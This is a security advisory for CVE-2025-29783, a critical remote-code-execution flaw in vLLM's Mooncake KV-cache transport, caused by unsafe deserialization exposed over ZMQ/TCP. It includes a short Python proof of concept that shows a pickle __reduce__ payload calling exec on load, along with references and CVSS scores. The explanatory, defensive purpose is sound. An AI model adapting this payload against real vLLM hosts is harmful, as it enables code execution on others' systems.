CVE-2025-29783

Critical

Description

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. When vLLM is configured to use Mooncake, unsafe deserialization exposed directly over ZMQ/TCP on all network interfaces allows attackers to execute remote code on distributed hosts. This is a remote code execution vulnerability affecting any deployment that uses Mooncake to distribute the KV cache across hosts. The vulnerability is fixed in vLLM 0.8.0.
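To illustrate why deserializing untrusted bytes from a network socket amounts to remote code execution, the sketch below simulates the attack pattern locally with Python's `pickle`. This is a generic demonstration of the vulnerability class, not the exact vLLM/Mooncake code path; the transport (a ZMQ TCP socket in the real deployment) is omitted, and the `Exploit` class and the `PWNED` marker are hypothetical.

```python
import os
import pickle

class Exploit:
    """A payload class an attacker would serialize and send over the wire."""
    def __reduce__(self):
        # pickle records this callable and its arguments; pickle.loads()
        # will invoke exec(...) at deserialization time, before any
        # application code can inspect the data.
        return (exec, ("import os; os.environ['PWNED'] = '1'",))

# Bytes the attacker would transmit over the exposed ZMQ/TCP endpoint.
malicious_bytes = pickle.dumps(Exploit())

# A vulnerable receiver does the equivalent of this on every message it
# reads from the socket -- which executes the attacker's code:
pickle.loads(malicious_bytes)

print(os.environ.get("PWNED"))  # the attacker's code ran in-process
```

Because the deserializer runs attacker-controlled callables before returning, no later validation can help; the fix is to never feed untrusted network input to a pickle-style deserializer and to use a data-only format (e.g. JSON or msgpack) for inter-host messages.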

References

https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7

https://github.com/vllm-project/vllm/pull/14228

https://github.com/vllm-project/vllm/commit/288ca110f68d23909728627d3100e5a8db820aa2

Details

Source: Mitre, NVD

Published: 2025-03-19

Updated: 2025-03-22

Risk Information

CVSS v2

Base Score: 10.0

Vector: CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

Severity: Critical

CVSS v3

Base Score: 9.0

Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Severity: Critical